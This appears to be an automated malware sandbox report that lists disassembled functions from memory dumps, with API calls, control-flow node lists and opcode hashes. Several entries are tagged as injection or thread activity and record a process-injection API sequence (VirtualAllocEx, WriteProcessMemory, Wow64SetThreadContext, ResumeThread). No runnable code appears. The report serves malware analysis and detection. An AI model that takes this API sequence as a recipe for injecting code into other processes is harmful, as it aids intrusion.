                                                • Instruction Fuzzy Hash: B141CFB1D00349DFDF14CF9AC984ADEBBB5BF48314F24916AE819AB210D774A985CF90
                                                Function 014044B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1528 14044b0-14059b9 CreateActCtxA 1531 14059c2-1405a1c 1528->1531 1532 14059bb-14059c1 1528->1532 1539 1405a2b-1405a2f 1531->1539 1540 1405a1e-1405a21 1531->1540 1532->1531 1541 1405a40 1539->1541 1542 1405a31-1405a3d 1539->1542 1540->1539 1544 1405a41 1541->1544 1542->1541 1544->1544
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 014059A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 9fb98d00011e4aa9ca2dec9e338d7c4cd6b2afc87d06890ccecbe3f4173e684e
                                                • Instruction ID: 050203f91040c85cafce8b03815801e1c3a5b33af975aa3076f03c94bfb7166b
                                                • Opcode Fuzzy Hash: 9fb98d00011e4aa9ca2dec9e338d7c4cd6b2afc87d06890ccecbe3f4173e684e
                                                • Instruction Fuzzy Hash: 8541F370C0071DCBEB25CFAAC94478EBBB5FF88304F20806AD518AB251DB756946CF91
                                                Function 02E84040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1545 2e84040-2e8407c 1546 2e8412c-2e8414c 1545->1546 1547 2e84082-2e84087 1545->1547 1553 2e8414f-2e8415c 1546->1553 1548 2e84089-2e840c0 1547->1548 1549 2e840da-2e84112 CallWindowProcW 1547->1549 1556 2e840c9-2e840d8 1548->1556 1557 2e840c2-2e840c8 1548->1557 1550 2e8411b-2e8412a 1549->1550 1551 2e84114-2e8411a 1549->1551 1550->1553 1551->1550 1556->1553 1557->1556
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 02E84101
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2167842860.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e80000_file.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 5285a968939fd1813959d0ce6025ac3d6984f20936094bb6c25ee63a4afbb0e7
                                                • Instruction ID: 8389dd0902673dbc47898f1a49911504f440e116cf7988802eb465c741814d7d
                                                • Opcode Fuzzy Hash: 5285a968939fd1813959d0ce6025ac3d6984f20936094bb6c25ee63a4afbb0e7
                                                • Instruction Fuzzy Hash: 494117B5A0030ACFCB14DF99C448AAABBF5FF88314F24C499D559AB361D775A841CFA0
                                                Function 072650D0 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1559 72650d0-72650e2 1560 72650ea-72650f5 1559->1560 1561 72650e5 call 72620cc 1559->1561 1562 72650f7-7265107 1560->1562 1563 726510a-726519c CreateIconFromResourceEx 1560->1563 1561->1560 1566 72651a5-72651c2 1563->1566 1567 726519e-72651a4 1563->1567 1567->1566
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                • Opcode ID: eb26accc32d3ea705c011dbf4d3e93fae9808becd3b9dcde8558a35e1f6900fd
                                                • Instruction ID: 3c61d549ca4b2053230c955f8ba04ddcf80bc34ad318665b87c5e064be22acfc
                                                • Opcode Fuzzy Hash: eb26accc32d3ea705c011dbf4d3e93fae9808becd3b9dcde8558a35e1f6900fd
                                                • Instruction Fuzzy Hash: 2D317AB2914359DFCB11CFAAC844AAEBFF8EF09310F14845AE558A7221C335D854CFA1
                                                Function 07263FD1 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1570 7263fd1-7264024 1571 7264026-726402c 1570->1571 1572 726402f-726403e 1570->1572 1571->1572 1573 7264043-726407c DrawTextExW 1572->1573 1574 7264040 1572->1574 1575 7264085-72640a2 1573->1575 1576 726407e-7264084 1573->1576 1574->1573 1576->1575
                                                APIs
                                                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0726406F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID: DrawText
                                                • String ID:
                                                • API String ID: 2175133113-0
                                                • Opcode ID: a19c39bf766a6dfb4e7bfb3703065b4d816aa6b835a9505b75560e774c36eb28
                                                • Instruction ID: c3f81ee3f3ec06f5b0e5ce57679ceffd88f53b390b5a3c931045ed631aea4e44
                                                • Opcode Fuzzy Hash: a19c39bf766a6dfb4e7bfb3703065b4d816aa6b835a9505b75560e774c36eb28
                                                • Instruction Fuzzy Hash: 6921F4B5D1025A9FDB14DF9AD984A9EFBF5FF48310F14842AE819A7310D374A644CFA0
                                                Function 07263FD8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1579 7263fd8-7264024 1580 7264026-726402c 1579->1580 1581 726402f-726403e 1579->1581 1580->1581 1582 7264043-726407c DrawTextExW 1581->1582 1583 7264040 1581->1583 1584 7264085-72640a2 1582->1584 1585 726407e-7264084 1582->1585 1583->1582 1585->1584
                                                APIs
                                                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0726406F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID: DrawText
                                                • String ID:
                                                • API String ID: 2175133113-0
                                                • Opcode ID: 7135bd1ac38fba90c371dee6832eb3598f1cf21f7fef774d107b8357b5d78c79
                                                • Instruction ID: 748046c646ee8d6e231f41ef699ce3266f0e2a0be1d6f45396153efaf7edfe92
                                                • Opcode Fuzzy Hash: 7135bd1ac38fba90c371dee6832eb3598f1cf21f7fef774d107b8357b5d78c79
                                                • Instruction Fuzzy Hash: F021E2B590024A9FDB10DF9AD884A9EBBF5FB48320F14842AE919A7310D775A540CFA0
                                                Function 074BEBE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1588 74bebe8-74bec36 1590 74bec38-74bec44 1588->1590 1591 74bec46-74bec85 WriteProcessMemory 1588->1591 1590->1591 1593 74bec8e-74becbe 1591->1593 1594 74bec87-74bec8d 1591->1594 1594->1593
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074BEC78
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 9857937f55916206866b08bc26cf6f52ebe72c0270c355342eca9c5aac05aa31
                                                • Instruction ID: 5cc0d1dd595728a9ca51dffa21d534818db74e3e46aba191565f5abb7c050c78
                                                • Opcode Fuzzy Hash: 9857937f55916206866b08bc26cf6f52ebe72c0270c355342eca9c5aac05aa31
                                                • Instruction Fuzzy Hash: 2E2126B19003599FDB10CFA9C981BDEBBF5FF88310F14842AE918A7240D7789950CBA5
                                                Function 0140D648 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0140D616,?,?,?,?,?), ref: 0140D6D7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 37953e7359e964af20200f5cef33f6ab22667d3cb842c73259749474bf8337e1
                                                • Instruction ID: 5408fe1c1c7409623c32e50520730114e898d09c235c835c459c1866369701cd
                                                • Opcode Fuzzy Hash: 37953e7359e964af20200f5cef33f6ab22667d3cb842c73259749474bf8337e1
                                                • Instruction Fuzzy Hash: BF2105B5D00209DFDB10CF9AD984ADEBBF4FB48310F14842AE918A3350C378A944CFA5
                                                Function 0140D23C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0140D616,?,?,?,?,?), ref: 0140D6D7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: fdfe16536110f650a9009feb95fdfcedf5c2da3661e55a1266570ef8a2253802
                                                • Instruction ID: f6b162cbea564c120e9b33d58b77d6f57eda9d0834f7a438f21501593436603f
                                                • Opcode Fuzzy Hash: fdfe16536110f650a9009feb95fdfcedf5c2da3661e55a1266570ef8a2253802
                                                • Instruction Fuzzy Hash: 6621E5B5D00249DFDB10CF9AD984ADEBBF4EB48320F14845AE918A7350D378A954CFA5
                                                Function 074BE618 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074BE696
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 5eb1b80d4afb9a61dbd99c056226d61a5b526c1f705b8488b524733e04caefa2
                                                • Instruction ID: 817aebdabca74fa117f53f0e13a8addeb38b7ba2b64e115ce0e3eebc791e9eff
                                                • Opcode Fuzzy Hash: 5eb1b80d4afb9a61dbd99c056226d61a5b526c1f705b8488b524733e04caefa2
                                                • Instruction Fuzzy Hash: D22118B1D003199FDB10DFAAC4857EEBBF4AF88324F54842AD519A7340DB789944CFA5
                                                Function 074BECD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074BED58
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 6f1c05310eaa3322b25ed4dddf5f01f42632894dfafb6f335d9af9f1b7165d73
                                                • Instruction ID: 7fd049eb4b006861cde3378d8bca8b37f8a198ecafbac67d1c42d9c51ef734b1
                                                • Opcode Fuzzy Hash: 6f1c05310eaa3322b25ed4dddf5f01f42632894dfafb6f335d9af9f1b7165d73
                                                • Instruction Fuzzy Hash: D82128B180035A9FDB10CFAAC881BDEBBF5FF88310F54842AE518A7240C7789910CBA5
                                                Function 072620CC Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,072650EA,?,?,?,?,?), ref: 0726518F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                • Opcode ID: 2876df45ec1bd68258590a930a604ce004aa0416a9f5511fc3be5c94a991e67a
                                                • Instruction ID: a965166560c8ac47655e14648d5b95b0598268b11d081b3acb25ec4a3d9ebcfc
                                                • Opcode Fuzzy Hash: 2876df45ec1bd68258590a930a604ce004aa0416a9f5511fc3be5c94a991e67a
                                                • Instruction Fuzzy Hash: 6E1129B58143499FDB10CF9AC844BDEBFF8EB48320F14845AE514A7250C379A990CFA5
                                                Function 074B2778 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 074B27EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 7eac028b82e2d715385b54e615a3c6b09a389cd097f66f6f32fc666ed7780abc
                                                • Instruction ID: 5ae56f28bfa578d8047fe49478934b62aadc0444c0f6afe1ce23d2b7ef3996e8
                                                • Opcode Fuzzy Hash: 7eac028b82e2d715385b54e615a3c6b09a389cd097f66f6f32fc666ed7780abc
                                                • Instruction Fuzzy Hash: 8721D8B59002499FDB10DF9AC544BDEFBF4FF48320F108429E558A7250D378A544CFA5
                                                Function 074B2770 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 074B27EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: c87233d290bce40f97f595aee0e328f1a34f6af85a1b6d5f3210c7d9b554e522
                                                • Instruction ID: 00df2f70ac3e9dacbfe96cf1d3ca28ff7dd9209fa9d7295caa4fee7fd6fa2e3c
                                                • Opcode Fuzzy Hash: c87233d290bce40f97f595aee0e328f1a34f6af85a1b6d5f3210c7d9b554e522
                                                • Instruction Fuzzy Hash: ED21C7B59002499FDB10CF9AC544BDEBBF5FB48320F14842AE958A7350D3B89544CFA5
                                                Function 074BEB28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074BEB96
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: c2a45a9f5720edd018e760e08b45dba4eb097b6a11518e38e6cd87037013cd0f
                                                • Instruction ID: 51784e4e4b9f11fa43cb736c87690865c775af283a1e95bcd91fc5019f32ac22
                                                • Opcode Fuzzy Hash: c2a45a9f5720edd018e760e08b45dba4eb097b6a11518e38e6cd87037013cd0f
                                                • Instruction Fuzzy Hash: A91159718003499FDF20DFAAC845BDFBBF5AF88320F148419E519A7250C7799910CFA1
                                                Function 074BE130 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 9e63918fc94f612cfdc5f03157203fca0c4f3066814711187b53605788d97567
                                                • Instruction ID: 26b3d0974ac652ab61167b029b470fcfca67540fcdce49c4d1cc122335cc2027
                                                • Opcode Fuzzy Hash: 9e63918fc94f612cfdc5f03157203fca0c4f3066814711187b53605788d97567
                                                • Instruction Fuzzy Hash: B71128B19003498FDB20DFAAC8457DEFBF4AF88724F24845AD519A7240CB79A940CBA5
                                                Function 0140AF58 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0140AFBE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: e1123524eb3fc4f6623c5db91016a67d59d8c5927a2710d156e291876a5ea8a6
                                                • Instruction ID: 7d4c5d0d09b6d33f1096b7b0917a61bc516ff495e6c0d9a4ada7d6cebd6f6657
                                                • Opcode Fuzzy Hash: e1123524eb3fc4f6623c5db91016a67d59d8c5927a2710d156e291876a5ea8a6
                                                • Instruction Fuzzy Hash: 4D110FB6C003498FDB10CF9AC544BDEFBF4AF88224F20842AD528A7750C3B9A545CFA1
                                                Function 02D51DD8 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 02D51E3D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2166981085.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d50000_file.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: a677846e85006034e43c74dc58a09ee652975b996dd3104eea1f74231abcf036
                                                • Instruction ID: edb55cd37165f40ee491ba53370625c4e996daae0056711f64f069ad16ddf439
                                                • Opcode Fuzzy Hash: a677846e85006034e43c74dc58a09ee652975b996dd3104eea1f74231abcf036
                                                • Instruction Fuzzy Hash: 3711E3B58003499FDB20CF99D985BDEBFF4EB88324F248459D558A7300C3B9A944CFA1
                                                Function 02D51DE0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 02D51E3D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2166981085.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d50000_file.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 472351d07dd7360b03d7b8e8492bcd403006784d80e80482cb589b0e116a8a0d
                                                • Instruction ID: e42508d49df29c32964bd20d93028e01571de5697363b7cd24b5db11b628ed64
                                                • Opcode Fuzzy Hash: 472351d07dd7360b03d7b8e8492bcd403006784d80e80482cb589b0e116a8a0d
                                                • Instruction Fuzzy Hash: DE11D3B58003499FDB10DF9AD945BDEBBF8EB48724F108459D918A7300C3B9A944CFA5
                                                Function 0546FC6F Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 4d2b6e0b4f076743486fc683d84a80b42461d60b67e09f22ac30343b1f191192
                                                • Instruction ID: 0fe00230961038e50f0907a28be6684fdad49aef2df333551e970a1e719e7ce4
                                                • Opcode Fuzzy Hash: 4d2b6e0b4f076743486fc683d84a80b42461d60b67e09f22ac30343b1f191192
                                                • Instruction Fuzzy Hash: E311A335B00215EFCF15BB6898546BFBBB6AB85300F04847AE94D9B385DB718845C7E2
                                                Function 05461E70 Relevance: .8, Instructions: 778COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10d3ca95dd90a07fe902968770a81061eedde3a49f86ab7f7a19a7b481e035bb
                                                • Instruction ID: 2948f05cd45303efd3184af93dcf1fe19df75c96e47abd1ece01fc081590c307
                                                • Opcode Fuzzy Hash: 10d3ca95dd90a07fe902968770a81061eedde3a49f86ab7f7a19a7b481e035bb
                                                • Instruction Fuzzy Hash: E962EC74F04B459ED7749B6584983EFBAA1BB82301F504D9FC1FACA380DBB494858B87
                                                Function 05461EC0 Relevance: .4, Instructions: 447COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7142900b7f114164fbd387a02a97a7d20fe1e3e7c694f492c4ad6b375e01e83c
                                                • Instruction ID: f038ef80395f216c836b19cb6db90c8ab4b2727d6931bad17779ef29782f2440
                                                • Opcode Fuzzy Hash: 7142900b7f114164fbd387a02a97a7d20fe1e3e7c694f492c4ad6b375e01e83c
                                                • Instruction Fuzzy Hash: 77124DB8F09B425ED7745F6485883EFB690BB45301F60499FC0FACA395D774908A8B8B
                                                Function 05461EBF Relevance: .4, Instructions: 445COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b08950ba9bd8218225e957bec811198459e9e958f58955d5a7031484457356c6
                                                • Instruction ID: 30f6d9add1c42a4eea6b809cd5bc7a1e6af2216500862163e80230e984214748
                                                • Opcode Fuzzy Hash: b08950ba9bd8218225e957bec811198459e9e958f58955d5a7031484457356c6
                                                • Instruction Fuzzy Hash: 3E124DB8F09B425ED7745F6485883EFB690BB45301F60499FC0FACA395D774908A8B8B
                                                Function 0546E110 Relevance: .2, Instructions: 219COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3dec3a4bce920ee3118e4bd3055a4a166e69ab993da31ce6dca0290d0cc3f24d
                                                • Instruction ID: d01c5f64b9b49d349f48b26a279d7b9ffac8655c6b57fb4beeba2dbe717c9e83
                                                • Opcode Fuzzy Hash: 3dec3a4bce920ee3118e4bd3055a4a166e69ab993da31ce6dca0290d0cc3f24d
                                                • Instruction Fuzzy Hash: 8581E638710614CFC718EF29D498AAE7BF6BF89A04B1541AAE502CB375DB71EC41CB81
                                                Function 0546F5B0 Relevance: .2, Instructions: 210COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07661ea28d39a6a7b9dd083e7af3e2750fee8e4a24fa4b999f5bf10c12d00fa2
                                                • Instruction ID: 545c287eb2c0c41351facf503ec4e00d00937dbf043672111417a6208a0e3323
                                                • Opcode Fuzzy Hash: 07661ea28d39a6a7b9dd083e7af3e2750fee8e4a24fa4b999f5bf10c12d00fa2
                                                • Instruction Fuzzy Hash: 1981CA35A10208EFCB04DFA4D858AEDBBB5FF89301F10855AE542AB364DB70AD49CF91
                                                Function 0546DBD8 Relevance: .2, Instructions: 188COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e08d72128d33d175a7c119dd0dc406586f52d44ca5ab205af38da411e926ff6
                                                • Instruction ID: 6d580dce5897f9ab6cfa2a30f4d1ff0a1aeecccec4c778f71ff1c1535ec7d587
                                                • Opcode Fuzzy Hash: 9e08d72128d33d175a7c119dd0dc406586f52d44ca5ab205af38da411e926ff6
                                                • Instruction Fuzzy Hash: 7561F934B001188FDB14EBA9D594AEE77F2FF89310B2545AAD506EB7A0CB35EC41CB61
                                                Function 05463740 Relevance: .2, Instructions: 183COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e4ad2afe41771c20be9bea9cea652e0c734fb417ba52a161b8dc23d231134e89
                                                • Instruction ID: 8cbca4fe81f417166dcb15e7f3fce64e9c0d9bdfa813669f33ab9026ed8fbc8d
                                                • Opcode Fuzzy Hash: e4ad2afe41771c20be9bea9cea652e0c734fb417ba52a161b8dc23d231134e89
                                                • Instruction Fuzzy Hash: 1B714C30E006498FDB14DFA9D8547EEBBF6BF84301F10896AE906A7350EF349945CB92
                                                Function 054675E0 Relevance: .2, Instructions: 176COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27efcbb72477d778c1d232c6cde07202d53aec87c6754fd5d838b7be87e944dc
                                                • Instruction ID: 53ecdae7846b9025f2431a8a3e322a5712a0c4d720a0c33755a8af86cfe49058
                                                • Opcode Fuzzy Hash: 27efcbb72477d778c1d232c6cde07202d53aec87c6754fd5d838b7be87e944dc
                                                • Instruction Fuzzy Hash: 6D614C34B101098FDB15DF68D554BEE7BF6FF88715F1444AAE902AB390CA709C41CB92
                                                Function 054610D8 Relevance: .2, Instructions: 168COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f4857d80a8e80a4cd49f3092271f965efdbdc83b7d13608b41d055b81d85a69
                                                • Instruction ID: 66af61e4e0f9e6f0e07ace6d7651e41f3473f4da82e3c789277ec3a6174a1c22
                                                • Opcode Fuzzy Hash: 2f4857d80a8e80a4cd49f3092271f965efdbdc83b7d13608b41d055b81d85a69
                                                • Instruction Fuzzy Hash: 9D719E74A01208AFCB15DFA9D884EAEBBB6FF48714B114099F906AB361D731EC81CB51
